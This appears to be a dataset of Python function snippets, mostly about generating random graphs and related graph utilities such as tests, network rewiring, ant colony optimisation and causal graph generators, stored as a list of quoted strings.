"def create_random_heterogeneous_crosslinking(graph, data_output, b, c, shape, dclm, k, f):#!!!\n d = densities(Vt=b[2][0]*b[2][1]*b[2][2], dclm=dclm, c=k, f=f)\n if shape == 'croix': z = croix(graph, c, b, f)\n elif shape == 'sphere': z = sphere(graph, c, b, f=f)\n else: print \"heu\", shape\n m = list(set(graph.nodes()).difference(set(z)))\n modified_graph = reticuler(graph, ['miniboucle'], d['dclh'], zone = z, visuel = False, blabla=True)\n twice_modified_graph = reticuler(modified_graph, ['alea'], d['dclm'], zone = m, visuel = False, sauvdata = data_output)",
"def test_generate_graph(self):\n expected_graph = {\n \"a\":[\"b\", \"c\"],\n \"b\":[\"c\"],\n \"c\":[\"b\"],\n }\n\n assert self.graph.generate_graph() == expected_graph",
"def random_two_graph(n):\n return nx.fast_gnp_random_graph(n, 2/(n*n), directed=True)",
"def generate_categorical_graph(num_vars,\n min_categs,\n max_categs,\n inputs_independent=False,\n use_nn=True,\n deterministic=False,\n graph_func=generate_random_graph,\n seed=-1,\n **kwargs):\n if seed >= 0:\n np.random.seed(seed)\n random.seed(seed)\n torch.manual_seed(seed)\n\n if num_vars <= 26: # For less than 26 variables, we call the variables alphabetically, otherwise numerically\n variable_names = [n for i, n in zip(range(1, num_vars+1), string.ascii_uppercase)]\n else:\n variable_names = [r\"$X_{%s}$\" % i for i in range(1, num_vars+1)]\n var_num_categs = np.random.randint(min_categs, max_categs+1, size=(num_vars,))\n\n def dist_func(input_names, name):\n if min_categs != max_categs:\n input_num_categs = [var_num_categs[variable_names.index(v_name)] for v_name in input_names]\n num_categs = var_num_categs[variable_names.index(name)]\n else:\n input_num_categs, num_categs = [min_categs]*len(input_names), min_categs\n dist = get_random_categorical(input_names=input_names,\n input_num_categs=input_num_categs,\n num_categs=num_categs,\n inputs_independent=inputs_independent,\n use_nn=use_nn,\n deterministic=deterministic)\n return dist\n\n return graph_func(variable_names, dist_func, **kwargs)",
"def do_generations():\n # Extract the data from the initialised Instance\n gens = request.args.get('gens')\n gens = int(gens)\n current_gen = request.args.get('currentGen')\n current_gen = int(current_gen)\n client = request.args.get('client')\n graph_data = request.get_json()\n nodes = graph_data['nodes']\n alpha = graph_data['alpha']\n beta = graph_data['beta']\n decay = graph_data['decay']\n min_pheromone = graph_data['min_pheromone']\n q = graph_data['q']\n local_deposit = graph_data['local_deposit']\n distances = graph_data['distances']\n pheromones = graph_data['pheromones']\n ants = graph_data['ants']\n shortest_path = graph_data['shortest_path']\n min_distance = graph_data['min_distance']\n # Initialise an Instance copy\n i = Instance([], float(alpha), float(beta), float(decay), float(q))\n # Alter the Instance copy with the Instance data\n i.nodes = nodes\n i.min_pheromone = min_pheromone\n i.q = q\n i.local_deposit = local_deposit\n i.distances = distances\n i.pheromones = pheromones\n i.ants = ants\n i.shortest_path = shortest_path\n i.min_distance = min_distance\n # Perform the aco algorithm on the instance\n gen_reached, path, distance = i.aco(gens, current_gen, client)\n\n # Create a message for the console to output\n msg = \"Generation \" + str(gen_reached) + \" distance \" + str(distance) + \" path \" + str(path)\n return jsonify(nodes=i.nodes, alpha=i.alpha, beta=i.beta, decay=i.decay,\n min_pheromone=i.min_pheromone, q=i.q,\n local_deposit=i.local_deposit, distances=i.distances,\n pheromones=i.pheromones, ants=i.ants, shortest_path=i.shortest_path,\n min_distance=round(i.min_distance, 3), gen_reached = gen_reached, message=msg)",
"def sampled_clique(clusters,strategy):\n G = nx.Graph()\n sample = []\n #Sample 'size' nodes from a single cluster\n if strategy == \"rand\":\n size = len(clusters)\n while len(sample) < size:\n cluster = random.choice(clusters)\n if len(cluster) >= size:\n sample = random.sample(cluster,size)\n #Sample 1 choice from each cluster\n elif strategy == \"optim\":\n for _,cluster in clusters.items():\n if len(cluster) > 0:\n sample.append(random.choice(cluster))\n for n1 in sample:\n for n2 in sample:\n if n1 != n2:\n G.add_edge(n1,n2)\n return G",
"def generateUnaryRel(graph, dist=None):\n if dist is None:\n dist = lambda: random.randint(1, len(graph.nodes()))\n\n count = dist()\n return random.sample(graph.nodes(), count)",
"def generate_graph(self):\n temp_graph = [[] for i in xrange(Parameters.num_peers)]\n unconnected = set([i for i in xrange(Parameters.num_peers)])\n while len(unconnected) > 1:\n node1 = random.sample(unconnected, 1)[0]\n unconnected.remove(node1)\n node2 = random.sample(unconnected, 1)[0]\n temp_graph[node2].append(self.nodes[node1])\n temp_graph[node1].append(self.nodes[node2])\n unconnected = set([i for i in xrange(Parameters.num_peers)])\n i = 0\n for i in xrange(Parameters.num_peers*Parameters.num_neighbours/2-Parameters.num_peers):\n a = random.sample(unconnected, 1)[0]\n b = random.sample(unconnected, 1)[0]\n while b == a:\n b = random.sample(unconnected, 1)[0]\n temp_graph[a].append(self.nodes[b])\n temp_graph[b].append(self.nodes[a])\n graph = {}\n for i in xrange(len(self.nodes)):\n graph[\"P_\" + str(i)] = list(set(temp_graph[i]))\n return graph",
"def randomGraph(n,base=True,bSize=None,stronglyCon=False):\n A = (np.random.rand(n,n)>np.random.rand())*1.\n for j in range(n): A[j,j] = 0\n nodes = list(range(n))\n\n if stronglyCon:\n while not nx.is_strongly_connected(nx.DiGraph(A)):\n A = (np.random.rand(n,n)>np.random.rand())*1.\n for j in range(n): A[j,j] = 0\n nodes = list(range(n))\n\n if base:\n if bSize is None:\n bSize = np.random.randint(1,high=n)\n base = list(np.random.choice(nodes,replace=False,size=bSize))\n return A,base\n return A",
"def createRandomGraph():\n g = {}\n n = random.sample([0,1,2,3,4,5,6,7,8,9], 7)\n for i in n:\n g[i] = []\n edges = random.randint(10,20)\n count = 0\n while count < edges:\n a = random.choice(n)\n b = random.choice(n)\n if b not in g[a] and a != b:\n g[a].append(b)\n count += 1\n return g",
"def _make_random_graph(self, graph: mazegraph.MazeGraph):\n rmg.generate_random_maze(graph, self._settings)",
"def generate_Graph(edge, vertex):\n\tif edge > vertex *(vertex -1)/2 or vertex <0 or edge < 0:\n\t\tprint(\"Invalid number of edges\")\n\t\treturn None\n\n\tgraph = [[0 for x in range(vertex)] for y in range(vertex)] \n\t\n\t\n\twhile edge >0:\n\t\ta = random.randint(0,vertex-1)\n \n\t\tb = random.randint(0,vertex-1)\n\n\t\tif graph[a][b] == 1 or a ==b: \n\t\t\tcontinue\n\n\t\telse: \n\t\t\t\n\t\t\tedge = edge -1\n\t\t\tgraph[a][b] = 1\n\t\t\tgraph[b][a] = 1\n\treturn graph",
"def build_disconnected_test_graph():\n graph = build_triangle_graph()\n g2 = build_triangle_graph()\n g3 = build_triangle_graph()\n\n merge_graphs(graph, g2)\n merge_graphs(graph, g3)\n\n return graph",
"def _graph_fn_sample_deterministic(self, distribution):\n raise NotImplementedError",
"def random_one_graph(n):\n return nx.fast_gnp_random_graph(n, 1/(n*n), directed=True)",
"def generate_graph(size, number_of_clusters, minimal_size):\n base_list = list(range(size))\n result_list = []\n random.shuffle(base_list)\n for i in range(number_of_clusters - 1):\n size = random.randint(minimal_size, len(base_list) - (number_of_clusters - i - 1) * minimal_size)\n cluster = []\n for n in range(size):\n actual = random.choice(base_list)\n base_list.remove(actual)\n cluster.append(actual)\n result_list.append(strongly_connect(cluster))\n result_list.append(strongly_connect(base_list))\n\n while len(result_list) < 5:\n result_list.append([])\n\n print(sorted([len(i) for i in result_list], reverse=True)[:5])\n\n return weak_connect_graph(result_list)",
"def gen_graph(self):",
"def test_graph1():\n mol_graph = DGLGraph([(0, 1), (0, 2), (1, 2)])\n node_feats = torch.arange(mol_graph.number_of_nodes()).float().reshape(-1, 1)\n edge_feats = torch.arange(2 * mol_graph.number_of_edges()).float().reshape(-1, 2)\n\n complete_graph = get_complete_graph(mol_graph.number_of_nodes())\n atom_pair_feats = torch.arange(complete_graph.number_of_edges()).float().reshape(-1, 1)\n\n return mol_graph, node_feats, edge_feats, complete_graph, atom_pair_feats",
"def random_coaching_graph(num_classes, min_size, max_size, existing_rate):\n\n n = 0\n coaching_graph = graph.Graph(directed=True)\n for i in range(num_classes):\n n += 1\n class_size = random.randint(min_size, max_size)\n coach = infect.User(str(n))\n existing_users = coaching_graph.nodes()\n num_existing = len(existing_users)\n coaching_graph.add_node(coach)\n for j in range(class_size):\n if random.uniform(0,1) > existing_rate or num_existing < 100:\n n += 1\n user = infect.User(str(n))\n else:\n user = random.choice(existing_users)\n\n coaching_graph.add_edge(coach, user)\n\n\n return coaching_graph",
"def random_order(graph):\n return random.sample(graph, len(graph))",
"def generate_disjoint_omega_data(*args):\n if len(args) == 2:\n return generate_disjoint_omega(args[0], args[1])\n else:\n return generate_disjoint_biased_omega(args[0], args[1], args[2])",
"def generate_random_DC_single_force_uncoupled_tensor():\n # Generate random DC MT and single force:\n random_DC_MT_normallised = generate_random_DC_MT() # Generate a random DC sample\n random_single_force_normallised = generate_random_single_force_vector()\n # And split the amplitude of DC to single force randomly:\n random_amp_frac = random.random() # random number between 0. and 1.\n random_DC_MT_normallised = random_DC_MT_normallised*random_amp_frac\n random_single_force_normallised = random_single_force_normallised*(1.-random_amp_frac)\n # Finally combine to tensor of length 9:\n random_DC_single_force_uncoupled_tensor = np.vstack((random_DC_MT_normallised, random_single_force_normallised))\n return random_DC_single_force_uncoupled_tensor, random_amp_frac",
"def make_ws_graph(num_nodes, clockwise_neighbours, rewiring_prob):\r\n #initialize empty graph\r\n ws_graph = {}\r\n for vertex in range(num_nodes): ws_graph[vertex] = []\r\n #add each vertex to clockwise neighbours\r\n for vertex in range(num_nodes):\r\n for neighbour in range(vertex + 1, vertex + clockwise_neighbours + 1):\r\n neighbour = neighbour % num_nodes\r\n ws_graph[vertex] += [neighbour]\r\n ws_graph[neighbour] += [vertex]\r\n for vertex in range(num_nodes):\r\n for neighbour in ws_graph[vertex]:\r\n if random.random() < rewiring_prob:\r\n ws_graph[vertex].remove(neighbour)\r\n ws_graph[neighbour].remove(vertex)\r\n randNode = random.randint(0, num_nodes-1)\r\n while(vertex == randNode):\r\n randNode = random.randint(0, num_nodes - 1)\r\n ws_graph[vertex] += [randNode]\r\n ws_graph[randNode] += [vertex]\r\n\r\n\r\n return ws_graph\r\n #rewire each edge with probability rewiring_prob\r\n\r\n #consider each vertex\r\n\r\n #consider each neighbour\r\n\r\n #decide whether to rewire and join to a random node\r\n\r\n #update if necessary\r",
"def unique_iso(gs):\n # For speed, instead of using a separate isomorphism-checking\n # function, we use our own helper function ck_iso. This checks\n # isomorphism of 2 graphs, given the graphs and their _degree_verts\n # output.\n def ck_iso(gc, gcdv, hc, hcdv):\n # Compare nbr-degree sequences\n if len(gcdv) != len(hcdv):\n return False\n for k in gcdv:\n if k not in hcdv:\n return False\n if len(gcdv[k]) != len(hcdv[k]):\n return False\n # Now we know that gc, hc have the same order\n\n # Try all permutations of the vertex set of graph g that take\n # each vertex to a vertex whose neighbors have the same degree\n # sequence.\n n = len(gc)\n hcsets = list(map(set, hc))\n for p in _partition_perms(list(gcdv.values()), n):\n for v in range(n):\n if hcsets[p[v]] != set([p[w] for w in gc[v]]):\n # A set comprehension would be nice above\n break\n else:\n return True\n return False\n\n # canons is list of pairs: (gc, gcdv)\n canons = []\n\n for g in gs:\n gdv = _degree_verts(g)\n gvp = list(itertools.chain.from_iterable(\n ( gdv[k] for k in sorted(gdv.keys()) )\n ))\n\n # Make semi-canonical form of g\n gc = [ sorted([gvp.index(w) for w in g[v]]) for v in gvp ]\n gcdv = _degree_verts(gc)\n\n # Check isomorphism w/ each graph in canons\n for hc, hcdv in canons:\n if ck_iso(gc, gcdv, hc, hcdv):\n break\n else:\n canons.append((gc, gcdv))\n yield g",
"def makeValid(Xs, graph, td, seed=None):\n # add direct edges when transition is impossible\n check=probX(Xs, graph, td)\n while check[0] == -np.inf:\n if isinstance(check[1],tuple):\n graph[check[1][0], check[1][1]] = 1\n graph[check[1][1], check[1][0]] = 1\n # i think these 2 lines are no longer necessary\n #elif check[1] == \"prior\":\n # raise ValueError('Starting graph has prior probability of 0.0')\n elif isinstance(check[1],int):\n # when list contains one item and node is unreachable, connect to random node\n nplocal = np.random.RandomState(seed)\n randnode = nplocal.choice(range(len(graph)))\n graph[check[1], randnode] = 1\n graph[randnode, check[1]] = 1\n else:\n raise ValueError('Unexpected error from makeValid()')\n check=probX(Xs, graph, td)\n return graph",
"def build_square_test_graph_with_costs(directed=False):\n if directed:\n graph = DirectedGraph()\n else:\n graph = UndirectedGraph()\n\n graph.new_node()\n graph.new_node()\n graph.new_node()\n graph.new_node()\n graph.new_edge(1, 2, 2)\n graph.new_edge(1, 4, 10)\n graph.new_edge(2, 3, 3)\n graph.new_edge(3, 4, 1)\n\n return graph",
"def iGraphFromTuples(association_tuples):\n \n# #get unique words\n# vocab = set()\n# uppercase_tuples = []\n# for (s,r), stren in association_tuples:\n# uppercase_tuples.append((s.upper(), r.upper(), stren))\n# vocab.update(word_pair)\n \n# vocab = list(vocab) #convert to ordered list\n# \n# \n# graph = Graph(len(vocab), directed=True)\n# graph.vs[\"name\"] = vocab #set vertex names\n# edges, _ = zip(*association_tuples)\n# graph.add_edges(edges)\n #association_tuples = [(s.upper(),r.upper(),stren) for (s,r), stren in association_tuples]\n association_tuples = [(s,r,stren) for (s,r), stren in association_tuples]\n graph = Graph.TupleList(association_tuples, directed=True, weights=True)\n \n graph.vs[\"id\"] = graph.vs[\"name\"]\n \n #add weights\n# for s, r , stren in association_tuples:\n# graph[(s,r)] = stren\n neg_log_proportions = []\n for e in graph.es:\n neg_log_proportions.append(-log10(e[\"weight\"]))\n \n graph.es[\"-log weight\"] = neg_log_proportions\n \n assoc_object = AssociationIGraph()\n assoc_object.graph = graph\n return assoc_object",
"def _build_graphs(self):\n g1 = self._build_graph1()\n g2 = self._build_graph2(g1)\n return g1, g2",
"def make_graph_from_spec(graphtype, args):\n parsed = parse_graph_argument(graphtype, args)\n assert parsed['graphtype'] == graphtype\n return obtain_graph(parsed)",
"def make_random_undirected_graph(num_nodes, probility):\n graph = {}\n edges = 0\n for dummy_node in range(num_nodes):\n if dummy_node not in graph:\n graph[dummy_node] = set()\n for dummy_node_pair in range(num_nodes):\n if dummy_node_pair != dummy_node:\n a = random.random() # a real number [0,1)\n if a < probility:\n print dummy_node, dummy_node_pair\n graph[dummy_node].add(dummy_node_pair)\n if dummy_node_pair not in graph:\n graph[dummy_node_pair] = set([dummy_node])\n else:\n graph[dummy_node_pair].add(dummy_node)\n edges += len(graph[dummy_node])\n print \"number of edges are \", edges/2\n\n return graph",
"def reproduce(spec1, spec2):\n a = [1,0]*(total_params//2)\n random.shuffle(a)\n\n \"\"\"Mutation chance\"\"\"\n for i in range(len(a)):\n if random.random() <= mutation_chance:\n if a[i]==0:\n a[i] = 1\n else:\n a[i] = 0\n \n new_kid = []\n \n for i in range(len(spec1)):\n \n if a[i] == 0:\n new_kid.append(spec1[i])\n else:\n new_kid.append(spec2[i])\n return new_kid",
"def permuteEdgeTypes(self):\n\t\tpermuted_graph = copy.copy(self)\n\t\t# swap about half the edges\n\t\ti = len(self.graph)/2\n\t\twhile i > 0:\n\t\t\t# swap \n\t\t\tsourceA, targetA = random.choice(permuted_graph.graph.keys())\n\t\t\tiTypeA, emA = permuted_graph.graph[(sourceA, targetA)]\n\t\t\tsourceB, targetB = random.choice(permuted_graph.graph.keys())\n\t\t\tiTypeB, emB = permuted_graph.graph[(sourceB, targetB)]\n\t\t\tpermuted_graph.graph[(sourceA, targetA)] = (iTypeB, emB)\n\t\t\tpermuted_graph.graph[(sourceB, targetB)] = (iTypeA, emA)\n\n\t\t\ti -= 1\n\n\t\t# return a new graph object\t\t\n\t\treturn permuted_graph",
"def create_random_graph(no_vertices, no_edges):\r\n if no_vertices < 0 or no_edges < 0:\r\n raise GraphException(\"Error! The number of edges and number of vertices must be non-negative.\")\r\n if no_edges > no_vertices * (no_vertices - 1):\r\n raise GraphException(\"Error! Too many edges given.\")\r\n random_graph = UndirectedGraph(no_vertices)\r\n while no_edges:\r\n _from = random.randrange(0, no_vertices)\r\n _to = random.randrange(0, no_vertices)\r\n cost = random.randrange(0, MAX_GRAPH_COST + 1) # The costs will be in [0, MAX_COST]\r\n if not random_graph.is_edge_in_graph(_from, _to):\r\n random_graph.add_edge(_from, _to, cost)\r\n no_edges = no_edges - 1\r\n return random_graph",
"def test_choose_end_not_random_vertex_graph(self):\n self.assertEquals(\n Dijkstras().dijkstras(self.g2, 'a', 'b'), (2, ['a', 'b']))",
"def get_graph_func(name):\n if name == \"chain\":\n f = generate_chain\n elif name == \"bidiag\":\n f = generate_bidiag\n elif name == \"collider\":\n f = generate_collider\n elif name == \"jungle\":\n f = generate_jungle\n elif name == \"full\":\n f = generate_full\n elif name == \"regular\":\n f = generate_regular_graph\n elif name == \"random\":\n f = generate_random_graph\n elif name.startswith(\"random_max_\"): # Random graph with maximum number of parents\n max_parents = int(name.split(\"_\")[-1])\n f = lambda *args, **kwargs: generate_random_graph(*args, max_parents=max_parents, **kwargs)\n else:\n f = generate_random_graph\n return f",
"def test_initialization_of_graphs():\n g = UndirectedGraph([('A', 2), (2, 'B'), ('B', 'C')])\n h = UndirectedGraph([('A', 2), ('B', 'C'), (2, 'B')])\n assert g == h\n \n # Raises ValueError since there are too few weights\n with pytest.raises(ValueError):\n g = UndirectedGraph([('A', 2), (2, 'B'), ('B', 'C')], [1, 2])\n \n g = UndirectedGraph([('A', 2), ('B', 'C'), ('B', 'C')], [1, 2, 2])\n assert g.weight(('B', 'C')) == 2",
"def rand_flip_graph(graph, edge):\n return rand_zero_or_one(0.5)\n # return rand_zero_or_one(edge_prob(graph, edge))",
"def __generate_graph(self, graph_type, graph_content):\n\n gv_format = str(self.__arg_options['format'])\n gv_type = str(graph_type)\n gv_location = str(self.__config_content['location'])\n gv_content = dict(graph_content)\n\n try:\n graph = GraphGenerator()\n graph.set_graph_config(gv_format, gv_location)\n graph.generate_graph(gv_content, gv_type)\n except (TypeError, ValueError) as error:\n self.__LOGGER.error(error)",
"def generate_problem(self, config: Config, iter_count: int) -> networkx.Graph:\n\n if config is None:\n config = {\"nodes\": 5}\n\n nodes = config['nodes']\n\n # Read in the original graph\n graph = nx.read_gpickle(os.path.join(os.path.dirname(__file__), \"reference_graph.gpickle\"))\n\n # Remove seams until the target number of seams is reached\n # Get number of seam in graph\n nodes_in_graph = [x for x in graph.nodes]\n nodes_in_graph.sort()\n\n if len(nodes_in_graph) < nodes:\n raise ValueError(f\"Too many nodes! The original graph has less seams than that!\")\n\n unwanted_nodes = nodes_in_graph[-len(nodes_in_graph) + nodes:]\n unwanted_nodes = [x for x in graph.nodes if x in unwanted_nodes]\n # Remove one node after another\n for node in unwanted_nodes:\n graph.remove_node(node)\n\n if not nx.is_connected(graph):\n logging.error(\"Graph is not connected!\")\n raise ValueError(f\"Graph is not connected!\")\n\n # normalize graph\n cost_matrix = self._get_tsp_matrix(graph)\n graph = nx.from_numpy_array(cost_matrix)\n\n self.application = graph\n return graph",
"def test_graph_factory_with_ambiguous_edges(\n gdcmodels: FakeModels,\n gdcdictionary: models.FakeDictionary,\n src_id: str,\n dst_id: str,\n edge_label: str,\n circle_1_to_2: str,\n circle_2_to_1: str,\n) -> None:\n gf = GraphFactory(gdcmodels, gdcdictionary)\n\n nodes = [\n {\"label\": \"circle_1\", \"node_id\": UUID1},\n {\"label\": \"circle_2\", \"node_id\": UUID2},\n ]\n\n edges = [\n {\"src\": src_id, \"dst\": dst_id, \"label\": edge_label},\n ]\n\n created_nodes = gf.create_from_nodes_and_edges(nodes=nodes, edges=edges, unique_key=\"node_id\")\n\n assert len(created_nodes) == 2\n\n circle_1s = [n for n in created_nodes if n.label == \"circle_1\"]\n assert len(circle_1s) == 1\n circle_1 = circle_1s[0]\n circle_1_to_2_assic = getattr(circle_1, circle_1_to_2)\n assert len(circle_1_to_2_assic) == 1\n circle_2s = [n for n in created_nodes if n.label == \"circle_2\"]\n assert len(circle_2s) == 1\n circle_2 = circle_2s[0]\n circle_2_to_1_assoc = getattr(circle_2, circle_2_to_1)\n assert len(circle_2_to_1_assoc) == 1\n assert circle_1_to_2_assic[0] == circle_2\n assert circle_2_to_1_assoc[0] == circle_1\n\n assert len(circle_1.edges_out + circle_1.edges_in) == 1\n assert len(circle_2.edges_out + circle_2.edges_in) == 1",
"def generate_computational_graph(RHS, schema):\n computational_graph=dict()\n for level in range(3):\n #use brute force to generate candidates for each level\n computational_graph[level]=[]\n if level== 0:\n for attribute in schema:\n if attribute !=RHS:\n computational_graph[level].append(set([attribute]))\n\n else:\n for element1 in computational_graph[level-1]:\n for element2 in computational_graph[0]:\n newelement = element1.union(element2)\n if newelement not in computational_graph[level]:\n if len(newelement)==level+1:\n computational_graph[level].append(newelement)\n\n return computational_graph",
"def generate(\n self,\n num_nodes_src_set: int,\n num_nodes_dst_set: int,\n num_edges_src_dst: int,\n num_edges_dst_src: int,\n is_directed: bool,\n return_node_ids: bool = False,\n transform_graph: bool = True,\n *args,\n **kwargs,\n ):\n raise NotImplementedError()",
"def create_graph(id):\n\n\timport numpy as np\n\timport networkx as nx\n\n\t# seed the rng\n\tseed = id\n\n\t# set base number of nodes and minimum number of edges\n\tn = 50\n\te = 100\n\n\t# randomise number of nodes\n\tpm1 = (-1)**(seed % 2)\n\tseed = rng(seed)\n\tn += pm1*(seed % 11)\n\tseed = rng(seed)\n\n\t# randomise minimum number of edges\n\tpm2 = (-1)**(seed % 2)\n\tseed = rng(seed)\n\te = 2*n + pm2*(seed % 11)\n\tseed = rng(seed)\n\n\t# initialise empty graph\n\tG = nx.convert_node_labels_to_integers(nx.empty_graph(n))\n\n\t# add e random edges before checking connectedness\n\twhile G.number_of_edges() < e:\n\t\tnode1 = seed % n\n\t\tseed = rng(seed)\n\t\tnode2 = seed % n\n\t\tseed = rng(seed)\n\t\tif node1 != node2:\n\t\t\tif node2 > node1:\n\t\t\t\tnode1, node2 = node2, node1\n\t\t\tG.add_edge(node1, node2)\n\n\t# if G is disconnected, find connected components and add edges\n\tif not nx.is_connected(G):\n\t\tcc = sorted(list(nx.connected_components(G)))\n\t\tlargest = cc[0]\n\t\tfor i in range(len(cc)):\n\t\t\tif len(cc[i]) > len(largest):\n\t\t\t\tlargest = cc[i]\t\t\n\t\tfor component in cc:\n\t\t\tif component != largest:\n\t\t\t\tnode1 = list(component)[seed % len(component)]\n\t\t\t\tseed = rng(seed)\n\t\t\t\tnode2 = list(largest)[seed % len(largest)]\n\t\t\t\tseed = rng(seed)\n\t\t\t\tif node2 > node1:\n\t\t\t\t\tnode1, node2 = node2, node1\n\t\t\t\tG.add_edge(node1, node2)\n\n\t# if for some reason G is still disconnected, print a helpful error message\n\tif nx.is_connected(G):\n\t\treturn G\n\telse:\n\t\tprint(\"Sorry, failed to produce a connected graph :( Please contact one of your lecturers.\")",
"def generation_next(prev_gen):\n next_gen = []\n\n # Iter through list of graphs\n for original_graph in prev_gen:\n # Select edges to nodes which are at distance 2\n select_edges = dist2_nodepairs(original_graph)\n\n # Go through the list of possible selected edges and add one\n for test_edge in select_edges:\n test_graph = original_graph.copy()\n test_graph.add_edge(*test_edge)\n if (not graph_exists(test_graph, next_gen)) \\\n and check_test_graph(test_graph):\n next_gen.append(test_graph)\n\n return next_gen",
"def randnet(G):\n\t\n\t#initializationo of the lists\n\telst = G.get_edgelist()\n\tclst = G.es['color'][:]\n\tcdic = {}\n\tfor i,c in enumerate(clst):\n\t\tcdic[c]=i\n\tlst1 = [[]]*len(key)\n\tfor i,e in enumerate(elst):\n\t\tlst1[cdic[clst[i]]].append([e[0],e[1]])\n\t\t\n\t#randomization procedure\n\tfor i in range(random.randrange(100,200)):\n\t\tcid = cdic[random.choice(clst)] #random choice weighted by the frequency of each color\n\t\te1id = random.randrange(0,len(lst1[cid])) #random choice of edge with that color\n\t\te2id = random.randrange(0,len(lst1[cid]))\n\t\textop = random.randrange(0,2)#random choice of top/bottom\n\t\tttemp = lst1[cid][e1id][extop]\n\t\tlst1[cid][e1id][extop] = lst1[cid][e2id][extop]\n\t\tlst1[cid][e2id][extop] = ttemp\n\t\n\tcoutlst = []\n\teoutlst\t= []\n\tfor i in range(len(lst1)):\n\t\tc = clst[i]\n\t\tfor e in lst1[i]:\n\t\t\tcoutlst.append(c)\n\t\t\teoutlst.append((e[0],e[1]))\n\n\treturn [eoutlst,coutlst]",
"def GGPgraphrnd(alpha, sigma, tau):\n # `epsilon` truncated sampling\n epsilon = 1e-6\n W = ggprnd(alpha, sigma, tau, trc=epsilon)\n\n W_star = sum(W)\n D_star = poisson(W_star**2).rvs()\n\n U = W_star * uniform().rvs((D_star, 2))\n \n W_interval = np.concatenate([np.array([0.]), W.cumsum()])\n\n interval_ranks = histc(U.flatten(), W_interval)\n selected_atom = np.array([False] * len(W))\n selected_atom[np.unique(interval_ranks)] = True\n w_rem = sum(W[~selected_atom])\n w = sum(W[selected_atom])\n\n # D: directed multi-graph\n hash_table = {key: value for key, value in zip(np.unique(interval_ranks), range(len(np.unique(interval_ranks))))}\n indexer = lambda x: hash_table[x]\n indexer = np.vectorize(indexer)\n D = interval_ranks.reshape(D_star, 2)\n D = coo_matrix((np.ones(D_star), (indexer(D[:, 0]), indexer(D[:, 1]))), \n shape=(sum(selected_atom), sum(selected_atom)))\n Z = (D + D.T).astype(bool)\n\n return coo_matrix(Z), w, w_rem",
"def test_graph2():\n mol_graph1 = DGLGraph([(0, 1), (0, 2), (1, 2)])\n mol_graph2 = DGLGraph([(0, 1), (1, 2), (1, 3), (1, 4)])\n batch_mol_graph = dgl.batch([mol_graph1, mol_graph2])\n node_feats = torch.arange(batch_mol_graph.number_of_nodes()).float().reshape(-1, 1)\n edge_feats = torch.arange(2 * batch_mol_graph.number_of_edges()).float().reshape(-1, 2)\n\n complete_graph1 = get_complete_graph(mol_graph1.number_of_nodes())\n complete_graph2 = get_complete_graph(mol_graph2.number_of_nodes())\n batch_complete_graph = dgl.batch([complete_graph1, complete_graph2])\n atom_pair_feats = torch.arange(batch_complete_graph.number_of_edges()).float().reshape(-1, 1)\n\n return batch_mol_graph, node_feats, edge_feats, batch_complete_graph, atom_pair_feats",
"def fix_graph(self,graph):\n graph_compleate_reachable = False\n while not graph_compleate_reachable:\n not_reachable_in ,not_reachable_out = self.not_reachable(graph)\n for n in not_reachable_in:\n graph.add_edge(self.random.randint(0,n-1),n)\n for n in not_reachable_out:\n graph.add_edge(n,self.random.randint(n+1, self.nodes-1))\n graph_compleate_reachable = len(not_reachable_in)==0 and len(not_reachable_out)==0\n return graph",
"def topology_random_reconnect(self, probability):\n\t\tfor i in range(len(self.sites)):\n\t\t\tfor j in range(len(self.sites)):\n\t\t\t\tif (i != j) and (self.sites[j] in self.sites[i].neighbors):\n\t\t\t\t\tif numpy.random.rand() < probability / 2.0:\n\t\t\t\t\t\tchoice_list = [s for s in self.sites if not (s in self.sites[i].neighbors)]\n\t\t\t\t\t\tif len(choice_list) > 0:\n\t\t\t\t\t\t\tchoosed = numpy.random.choice(choice_list)\n\t\t\t\t\t\t\tself.sites[i].neighbors.remove(self.sites[j])\n\t\t\t\t\t\t\tself.sites[j].neighbors.remove(self.sites[i])\n\t\t\t\t\t\t\tself.sites[i].neighbors.append(choosed)\n\t\t\t\t\t\t\tchoosed.neighbors.append(self.sites[i])",
"def generate_disjoint_omega(omega, num_columns):\n dis_omega = []\n while len(dis_omega) != num_columns:\n lit_set = generate_random_literals(len(omega[1]), 0, 2)\n if check_disjunction(omega, lit_set):\n dis_omega.append(lit_set)\n\n return dis_omega",
"def generate(self):\n\n g = nx.Graph()\n g.add_nodes_from(self.graph.nodes)\n\n num_nodes = g.number_of_nodes()\n\n degree_sequence = sorted([d for n, d in self.graph.degree()])\n degree_count = Counter(degree_sequence)\n deg, cnt = zip(*degree_count.items())\n\n degree_probs = [c / sum(cnt) for c in cnt]\n\n for i in range(num_nodes):\n num_edges = np.random.choice(a=deg, p=degree_probs) - g.degree[i]\n\n if num_edges > 0:\n ranking = self.ranker.get_ranking(i)\n probs = get_rank_probabilities(len(ranking))\n target_nodes = np.random.choice(a=ranking, p=probs, size=num_edges, replace=False)\n\n for j in target_nodes:\n g.add_edge(i, j)\n\n return g",
"def random_graph(n, m):\n G = Graph()\n for v in range(n):\n G.add_vertex(v)\n \n while G.num_edges() < m:\n G.add_edge(random.sample(range(n), 2))\n\n return G",
"def test_graph_directed():\n topo = complete_topology(5)\n assert isinstance(topo.get_graph(), networkx.DiGraph)\n # even if original graph is undirected\n topo = Topology(u'noname', networkx.star_graph(8))\n assert topo.get_graph().is_directed()",
"def build_topology_regular(config):\n\n size = config['RegularTopology']['size']\n degree = config['RegularTopology']['degree']\n seed = config['Simulation']['seed']\n\n assert size > 0\n assert degree >= 0\n\n top = nx.random_regular_graph(d=degree, n=size, seed=seed)\n top.name = 'Random Regular Graph: {n} nodes, {d} degree, {s} seed'.format(n=size, d=degree, s=seed)\n return top",
"def create_model(opts):\n # G = DCGenerator(noise_size=opts.noise_size, conv_dim=opts.conv_dim)\n # D = DCDiscriminator(conv_dim=opts.conv_dim)\n G = DCGenerator()\n D = DCDiscriminator()\n\n return G, D",
"def make_random_graph(num_nodes, prob):\n #initialize empty graph\n random_graph = {}\n #consider each vertex\n for i in range(num_nodes):\n random_graph[i] = []\n\n for vertex in range(num_nodes):\n for neighbour in range(vertex+1, num_nodes):\n random_number = random.random()\n if random_number < prob:\n random_graph[vertex] += [neighbour]\n random_graph[neighbour] += [vertex] \n #add vertex with list of out_ neighbours\n\n return random_graph",
"def __init__(self, graph: ghidra.graph.GImplicitDirectedGraph, maxDistance: float, metric: ghidra.graph.GEdgeWeightMetric):\n ...",
